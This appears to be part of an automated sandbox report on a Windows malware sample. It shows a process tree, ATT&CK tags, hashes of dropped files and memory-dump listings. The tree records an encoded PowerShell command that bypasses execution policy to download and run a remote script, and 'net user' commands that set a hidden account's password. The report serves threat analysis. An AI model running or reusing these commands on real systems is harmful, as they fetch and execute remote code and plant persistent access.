C:\Windows\system32\net1 user wgautilacc 9gM25Ibj
3⤵
PID:1608

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:1232

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Modifies data under HKEY_USERS
PID:2160

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3964

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Modifies data under HKEY_USERS
PID:1728

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2444

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:4020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:212

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:1840

C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
PID:1728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
PID:1284

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES79D9.tmp
MD5
735de5a4d38ceb1137c44dc8f4e61eef

SHA1
934174487fa9f47c17ae4e548240feca8e6e36b9

SHA256
115f3ef59bcc08618db55689a96ab9ed081f690397b4953f4b0573682c87dce7

SHA512
fb593063b564798d238ac05b1a8f195019eb36c955f6bca46750198e8e66ab913bd28422e55b383f60e1e05cab2cd77630a5e4a3865f0a298715ded6712a04a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
MD5
920b50692e0e9c4e32c79f89fafce0c4

SHA1
4cb71db2bb05daa4e84c649b6c58cbfd20c8e484

SHA256
85fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf

SHA512
966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86

Download Submit
C:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.dll
MD5
564cfb92500724a343fc62886af8f124

SHA1
d21628f28d0d011fe0326376326e631e88ac69d7

SHA256
330bb1972638ca1a7452892796773da631caf93930c7e2a6aa68a549fb985fb3

SHA512
1c7312125d543b768875a1e6ac33866dc771cddfd7baff428666f8db3275ef5052c71ea143b6b7c79c976fbc9099de182a32308106ebd0f14a7f25e616337467

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\swcgawoz\CSC2C10604955244B3BB8E4FF5CA2DE646.TMP
MD5
59c8411fea678ce22b0a7902c98e170e

SHA1
3e459d07f4836529c5565131a42361bed60900b4

SHA256
07c70556d3be8283352d88d1d7e845e07beaadb6df77aab5f51a97a2c8d04197

SHA512
f8e325c988ab1f64bf018076539aa86732a929dd1d5972fb12bbd7ece577f44d179a9938b0aaa613944646cc912ff565d3927275a5cf283191b16a79d5f64158

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.0.cs
MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.cmdline
MD5
5563885b07efbdba15ff19eeec444ba9

SHA1
7f27f3ff9038db7a3a398438567985071f74b046

SHA256
a961e1d08122404998448f796a322c57557f5fd6efeeeff656ec2c6cfc9387b4

SHA512
120e686a29fef220c16211136a6471eff0550a77a3e6eb8ea34a6f24c0504e963466899f53663fffeaa71d86e4448ea173e2d9587ae7b952b20e812cac361fa9

Download Submit
\Windows\Branding\mediasrv.png
MD5
96a6c5d47b0670a98699b2b424e2e65e

SHA1
57a31831c368efd82801f94a1b72c7230f4288be

SHA256
bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f

SHA512
b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55

Download Submit
\Windows\Branding\mediasvc.png
MD5
a3da4eee0a06c45c5bec80fd959ad539

SHA1
a8d2d3691af2e1af85ed8947347d0981017b7a32

SHA256
8a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c

SHA512
8d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b

Download Submit
memory/188-230-0x0000000000000000-mapping.dmp

Download
memory/212-242-0x00000269E5263000-0x00000269E5265000-memory.dmp

Filesize
8KB

Download
memory/212-243-0x00000269E5266000-0x00000269E5268000-memory.dmp

Filesize
8KB

Download
memory/212-240-0x0000000000000000-mapping.dmp

Download
memory/212-241-0x00000269E5260000-0x00000269E5262000-memory.dmp

Filesize
8KB

Download
memory/212-244-0x00000269E5268000-0x00000269E5269000-memory.dmp

Filesize
4KB

Download
memory/512-216-0x0000000000000000-mapping.dmp

Download
memory/656-234-0x0000000000000000-mapping.dmp

Download
memory/668-117-0x0000023EFDDE3000-0x0000023EFDDE5000-memory.dmp

Filesize
8KB

Download
memory/668-114-0x0000023EFDDE0000-0x0000023EFDDE2000-memory.dmp

Filesize
8KB

Download
memory/668-119-0x0000023EFDDE6000-0x0000023EFDDE7000-memory.dmp

Filesize
4KB

Download
memory/668-115-0x0000023EFE220000-0x0000023EFE641000-memory.dmp

Filesize
4.1MB

Download
memory/668-118-0x0000023EFDDE5000-0x0000023EFDDE6000-memory.dmp

Filesize
4KB

Download
memory/1264-200-0x0000000000000000-mapping.dmp

Download
memory/1264-205-0x0000028375626000-0x0000028375628000-memory.dmp

Filesize
8KB

Download
memory/1264-203-0x0000028375623000-0x0000028375625000-memory.dmp

Filesize
8KB

Download
memory/1264-202-0x0000028375620000-0x0000028375622000-memory.dmp

Filesize
8KB

Download
memory/1276-221-0x0000000000000000-mapping.dmp

Download
memory/1284-246-0x0000000000000000-mapping.dmp

Download
memory/1588-178-0x0000017170810000-0x0000017170812000-memory.dmp

Filesize
8KB

Download
memory/1588-201-0x0000017170818000-0x000001717081A000-memory.dmp

Filesize
8KB

Download
memory/1588-179-0x0000017170813000-0x0000017170815000-memory.dmp

Filesize
8KB

Download
memory/1588-182-0x0000017170816000-0x0000017170818000-memory.dmp

Filesize
8KB

Download
memory/1588-165-0x0000000000000000-mapping.dmp

Download
memory/1588-226-0x0000000000000000-mapping.dmp

Download
memory/1588-233-0x0000000000000000-mapping.dmp

Download
memory/1608-236-0x0000000000000000-mapping.dmp

Download
memory/1728-238-0x0000000000000000-mapping.dmp

Download
memory/1728-245-0x0000000000000000-mapping.dmp

Download
memory/1728-211-0x0000000000000000-mapping.dmp

Download
memory/2016-219-0x0000000000000000-mapping.dmp

Download
memory/2088-227-0x0000000000000000-mapping.dmp

Download
memory/2144-220-0x0000000000000000-mapping.dmp

Download
memory/2160-208-0x0000021D62BA6000-0x0000021D62BA8000-memory.dmp

Filesize
8KB

Download
memory/2160-237-0x0000000000000000-mapping.dmp

Download
memory/2160-204-0x0000000000000000-mapping.dmp

Download
memory/2160-206-0x0000021D62BA0000-0x0000021D62BA2000-memory.dmp

Filesize
8KB

Download
memory/2160-209-0x0000021D62BA8000-0x0000021D62BAA000-memory.dmp

Filesize
8KB

Download
memory/2160-207-0x0000021D62BA3000-0x0000021D62BA5000-memory.dmp

Filesize
8KB

Download
memory/2164-247-0x0000000000000000-mapping.dmp

Download
memory/2172-248-0x0000000000000000-mapping.dmp

Download
memory/2228-213-0x0000000000000000-mapping.dmp

Download
memory/2232-222-0x0000000000000000-mapping.dmp

Download
memory/2236-214-0x0000000000000000-mapping.dmp

Download
memory/2360-218-0x0000000000000000-mapping.dmp

Download
memory/2364-212-0x0000000000000000-mapping.dmp

Download
memory/2392-145-0x0000000000000000-mapping.dmp

Download
memory/2500-228-0x0000000000000000-mapping.dmp

Download
memory/2504-235-0x0000000000000000-mapping.dmp

Download
memory/3028-135-0x0000022B142B0000-0x0000022B142B2000-memory.dmp

Filesize
8KB

Download
memory/3028-144-0x0000022B142B6000-0x0000022B142B8000-memory.dmp

Filesize
8KB

Download
memory/3028-158-0x0000022B2F850000-0x0000022B2F851000-memory.dmp

Filesize
4KB

Download
memory/3028-157-0x0000022B2F4C0000-0x0000022B2F4C1000-memory.dmp

Filesize
4KB

Download
memory/3028-151-0x0000022B142B8000-0x0000022B142B9000-memory.dmp

Filesize
4KB

Download
memory/3028-126-0x0000022B16180000-0x0000022B16181000-memory.dmp

Filesize
4KB

Download
memory/3028-149-0x0000022B161D0000-0x0000022B161D1000-memory.dmp

Filesize
4KB

Download
memory/3028-131-0x0000022B2EEE0000-0x0000022B2EEE1000-memory.dmp

Filesize
4KB

Download
memory/3028-136-0x0000022B142B3000-0x0000022B142B5000-memory.dmp

Filesize
8KB

Download
memory/3028-120-0x0000000000000000-mapping.dmp

Download
memory/3120-229-0x0000000000000000-mapping.dmp

Download
memory/3576-225-0x0000000000000000-mapping.dmp

Download
memory/3724-210-0x0000000000000000-mapping.dmp

Download
memory/3744-141-0x0000000000000000-mapping.dmp

Download
memory/3892-215-0x0000000000000000-mapping.dmp

Download
memory/3964-232-0x0000000000000000-mapping.dmp

Download
memory/4020-239-0x0000000000000000-mapping.dmp

Download
memory/4020-217-0x0000000000000000-mapping.dmp

Download
memory/4056-231-0x0000000000000000-mapping.dmp

Download